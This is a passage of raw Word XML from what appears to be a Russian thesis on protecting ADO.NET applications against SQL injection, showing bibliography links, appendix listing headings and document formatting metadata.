          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (ADO.NET) : http</w:t>
      </w:r>
      <w:r w:rsidR="00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s://msdn.microsoft.com/ru-ru/</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https://msdn.microsoft.com/ru-ru/library/vstudio/bb669091(v=vs.100).aspx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Противодействие атакам, использующим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-инъекции: http://www.ibm.com/developerworks/ru/. -</w:t>
      </w:r>
      <w:r w:rsidRPr="006A740F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2014.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www</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ibm</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com</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developerworks</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library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se</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injection</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attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02D75"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слепые </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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>иънекции</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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xml:space="preserve">/. – 2014. –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BD</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1%81%</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8/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>slepye</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inekcii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</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и </w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ADO</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 xml:space="preserve">-инъекции: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00670F38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</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my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_</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base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level</w:t>
      </w:r>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6/6_3.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="006A740F" w:rsidRPr="009B2356" w:rsidRDefault="006A740F" w:rsidP="009B2356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EvilSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B2356">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : http://www.evilsql.com/main/index.php/. -URL: http://www.evilsql.com/main/page1.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3591E"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lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL Injection: http://www.w3schools.com. -URL:  http://www.w3schools.com/sql/sql_injection.asp</w:t>
      </w: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D21A0A" w:rsidRDefault="00020A8D" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc420429541"/>
      <w:bookmarkStart w:id="24" w:name="_Toc420789653"/>
      <w:r w:rsidRPr="00D21A0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc420429542"/>
      <w:bookmarkStart w:id="26" w:name="_Toc420789654"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00D3591E" w:rsidRPr="006C445E"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Абстрактный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базовый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класс</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="006C445E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc420429543"/>
      <w:bookmarkStart w:id="28" w:name="_Toc420789655"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>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27"/>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Pr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc420429544"/>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="003F3D0F" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc420789656"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>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29"/>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FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc420429545"/>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA7AED" w:rsidRPr="006C445E" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB5DBA" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc420789657"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00EB5DBA" w:rsidRPr="009F0170">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidR="00543C05" w:rsidRPr="009F0170" w:rsidRDefault="00543C05" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Методы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9F0170">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bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc420429546"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B32C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>StoreProcedureLessonsDal</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00020A8D" w:rsidRPr="009F0170" w:rsidRDefault="00020A8D" w:rsidP="003F3D0F">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_sqlConnection.Close();</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FA7AED" w:rsidRDefault="00FA7AED" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc420429547"/>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EB5DBA" w:rsidRDefault="00EB5DBA" w:rsidP="00EB5DBA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc420789658"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Листинг 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>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4"/>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[NewBase]</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[NewBase]</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headerReference w:type="even" r:id="rId24"/>
      <w:headerReference w:type="default" r:id="rId25"/>
      <w:footerReference w:type="even" r:id="rId26"/>
      <w:footerReference w:type="default" r:id="rId27"/>
      <w:headerReference w:type="first" r:id="rId28"/>
      <w:footerReference w:type="first" r:id="rId29"/>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212" w:rsidRDefault="00451212" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00451212" w:rsidRDefault="00451212"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EA" w:rsidRDefault="003654EA">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EA" w:rsidRDefault="003654EA">
    <w:pPr>
      <w:pStyle w:val="af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EA" w:rsidRDefault="003654EA">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212" w:rsidRDefault="00451212" w:rsidP="004936B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00451212" w:rsidRDefault="00451212" w:rsidP="004936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EA" w:rsidRDefault="003654EA">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EA" w:rsidRDefault="003654EA">
    <w:pPr>
      <w:pStyle w:val="af"/>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EA" w:rsidRDefault="003654EA">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2D056B"/>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C56913"/>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282A3A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E168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6C51D87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1152D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FE5A7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97BC7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3D65382"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D26E5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966D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="431C1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16"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="2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20866"/>
    <w:rsid w:val="00020A8D"/>
    <w:rsid w:val="00034EEB"/>
    <w:rsid w:val="00045266"/>
    <w:rsid w:val="00053534"/>
    <w:rsid w:val="000606E8"/>
    <w:rsid w:val="0008117F"/>
    <w:rsid w:val="000A78D7"/>
    <w:rsid w:val="000B289E"/>
    <w:rsid w:val="000C551A"/>
    <w:rsid w:val="000E7610"/>
    <w:rsid w:val="000F43FF"/>
    <w:rsid w:val="00116404"/>
    <w:rsid w:val="001202D9"/>
    <w:rsid w:val="001203E1"/>
    <w:rsid w:val="00165AA1"/>
    <w:rsid w:val="001708CA"/>
    <w:rsid w:val="00171CDD"/>
    <w:rsid w:val="0017464E"/>
    <w:rsid w:val="00176FF7"/>
    <w:rsid w:val="00187B14"/>
    <w:rsid w:val="001931C4"/>
    <w:rsid w:val="001B1F8C"/>
    <w:rsid w:val="001F5ACA"/>
    <w:rsid w:val="002407D8"/>
    <w:rsid w:val="00264D42"/>
    <w:rsid w:val="0027327E"/>
    <w:rsid w:val="00291342"/>
    <w:rsid w:val="002926C9"/>
    <w:rsid w:val="002A4219"/>
    <w:rsid w:val="002B6CA7"/>
    <w:rsid w:val="002C2095"/>
    <w:rsid w:val="002C385A"/>
    <w:rsid w:val="002C4CF1"/>
    <w:rsid w:val="002C71B6"/>
    <w:rsid w:val="002C7B42"/>
    <w:rsid w:val="002D7F39"/>
    <w:rsid w:val="002E0A68"/>
    <w:rsid w:val="00301693"/>
    <w:rsid w:val="00306034"/>
    <w:rsid w:val="00317A2F"/>
    <w:rsid w:val="00347079"/>
    <w:rsid w:val="00354B8E"/>
    <w:rsid w:val="003654EA"/>
    <w:rsid w:val="003665AA"/>
    <w:rsid w:val="00370BC8"/>
    <w:rsid w:val="0039677A"/>
    <w:rsid w:val="003A515D"/>
    <w:rsid w:val="003B32C2"/>
    <w:rsid w:val="003B7814"/>
    <w:rsid w:val="003C3BF9"/>
    <w:rsid w:val="003E5B4F"/>
    <w:rsid w:val="003E6B06"/>
    <w:rsid w:val="003F3D0F"/>
    <w:rsid w:val="00401E79"/>
    <w:rsid w:val="00412520"/>
    <w:rsid w:val="00417CBE"/>
    <w:rsid w:val="00423C8F"/>
    <w:rsid w:val="00431DC3"/>
    <w:rsid w:val="004325F4"/>
    <w:rsid w:val="004328E5"/>
    <w:rsid w:val="00451212"/>
    <w:rsid w:val="0046706C"/>
    <w:rsid w:val="004936B0"/>
    <w:rsid w:val="004A6E9B"/>
    <w:rsid w:val="004D6608"/>
    <w:rsid w:val="004D7FCD"/>
    <w:rsid w:val="004F5EBE"/>
    <w:rsid w:val="005001B9"/>
    <w:rsid w:val="005216DB"/>
    <w:rsid w:val="00523F7D"/>
    <w:rsid w:val="005243F3"/>
    <w:rsid w:val="00543C05"/>
    <w:rsid w:val="00546C81"/>
    <w:rsid w:val="00546FBD"/>
    <w:rsid w:val="00565E42"/>
    <w:rsid w:val="005678D0"/>
    <w:rsid w:val="00576652"/>
    <w:rsid w:val="00594000"/>
    <w:rsid w:val="005D6B28"/>
    <w:rsid w:val="005F5687"/>
    <w:rsid w:val="006012B7"/>
    <w:rsid w:val="00611C15"/>
    <w:rsid w:val="00651CE6"/>
    <w:rsid w:val="00670F38"/>
    <w:rsid w:val="00671BB3"/>
    <w:rsid w:val="00671EE4"/>
    <w:rsid w:val="00680A21"/>
    <w:rsid w:val="006A740F"/>
    <w:rsid w:val="006C445E"/>
    <w:rsid w:val="006C7B5F"/>
    <w:rsid w:val="006D3DB3"/>
    <w:rsid w:val="0071081A"/>
    <w:rsid w:val="007336D8"/>
    <w:rsid w:val="00742A82"/>
    <w:rsid w:val="00753818"/>
    <w:rsid w:val="00782588"/>
    <w:rsid w:val="007A3298"/>
    <w:rsid w:val="007A32FA"/>
    <w:rsid w:val="007C086F"/>
    <w:rsid w:val="007C78D1"/>
    <w:rsid w:val="007E142F"/>
    <w:rsid w:val="007E3794"/>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2C84"/>
    <w:rsid w:val="008E36F8"/>
    <w:rsid w:val="008E55BC"/>
    <w:rsid w:val="008F0DAD"/>
    <w:rsid w:val="009148D6"/>
    <w:rsid w:val="00920FAE"/>
    <w:rsid w:val="0093054C"/>
    <w:rsid w:val="00937BB9"/>
    <w:rsid w:val="00950EF9"/>
    <w:rsid w:val="0096766A"/>
    <w:rsid w:val="00973366"/>
    <w:rsid w:val="009A31ED"/>
    <w:rsid w:val="009B2356"/>
    <w:rsid w:val="009B366E"/>
    <w:rsid w:val="009B66DE"/>
    <w:rsid w:val="009B74C2"/>
    <w:rsid w:val="009D473D"/>
    <w:rsid w:val="009F0170"/>
    <w:rsid w:val="009F558E"/>
    <w:rsid w:val="00A02D75"/>
    <w:rsid w:val="00A1439B"/>
    <w:rsid w:val="00A455ED"/>
    <w:rsid w:val="00A5429B"/>
    <w:rsid w:val="00A852C0"/>
    <w:rsid w:val="00A91F54"/>
    <w:rsid w:val="00AB5BFF"/>
    <w:rsid w:val="00AC3A96"/>
    <w:rsid w:val="00AC3FC3"/>
    <w:rsid w:val="00AD04F4"/>
    <w:rsid w:val="00AD3834"/>
    <w:rsid w:val="00AD6EEA"/>
    <w:rsid w:val="00AE219B"/>
    <w:rsid w:val="00AF3055"/>
    <w:rsid w:val="00B13E25"/>
    <w:rsid w:val="00B53B61"/>
    <w:rsid w:val="00B5780C"/>
    <w:rsid w:val="00B60516"/>
    <w:rsid w:val="00B73CCD"/>
    <w:rsid w:val="00B82224"/>
    <w:rsid w:val="00B97D9A"/>
    <w:rsid w:val="00BB019C"/>
    <w:rsid w:val="00BD26D7"/>
    <w:rsid w:val="00BD45DC"/>
    <w:rsid w:val="00BF120D"/>
    <w:rsid w:val="00C0360F"/>
    <w:rsid w:val="00C17C3D"/>
    <w:rsid w:val="00C25028"/>
    <w:rsid w:val="00C250C0"/>
    <w:rsid w:val="00C31ABD"/>
    <w:rsid w:val="00C82EC8"/>
    <w:rsid w:val="00CB63D1"/>
    <w:rsid w:val="00D11F44"/>
    <w:rsid w:val="00D21A0A"/>
    <w:rsid w:val="00D26CBB"/>
    <w:rsid w:val="00D3591E"/>
    <w:rsid w:val="00D42262"/>
    <w:rsid w:val="00D73001"/>
    <w:rsid w:val="00D93C92"/>
    <w:rsid w:val="00D94490"/>
    <w:rsid w:val="00DD518C"/>
    <w:rsid w:val="00DE3C27"/>
    <w:rsid w:val="00DE4481"/>
    <w:rsid w:val="00DF708C"/>
    <w:rsid w:val="00E12733"/>
    <w:rsid w:val="00E12945"/>
    <w:rsid w:val="00E17E00"/>
    <w:rsid w:val="00E25A3F"/>
    <w:rsid w:val="00E2666F"/>
    <w:rsid w:val="00E27B80"/>
    <w:rsid w:val="00E62392"/>
    <w:rsid w:val="00E737A5"/>
    <w:rsid w:val="00EA1778"/>
    <w:rsid w:val="00EB18EE"/>
    <w:rsid w:val="00EB5DBA"/>
    <w:rsid w:val="00ED40D4"/>
    <w:rsid w:val="00EE02CA"/>
    <w:rsid w:val="00F06FEA"/>
    <w:rsid w:val="00F32B80"/>
    <w:rsid w:val="00F54FFF"/>
    <w:rsid w:val="00F84B90"/>
    <w:rsid w:val="00F8771A"/>
    <w:rsid w:val="00FA3BFA"/>
    <w:rsid w:val="00FA7AED"/>
    <w:rsid w:val="00FC4D17"/>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 w:type="paragraph" w:styleId="af">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C4CF1"/>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2C4CF1"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C4CF1"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af2">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002C4CF1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="parameter">
    <w:name w:val="parameter"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B97D9A"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sentence">
    <w:name w:val="sentence"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B97D9A"/>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168260187">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19046813">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588348127">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39451081">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813643439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="975338482">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1002008132">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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276474915">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
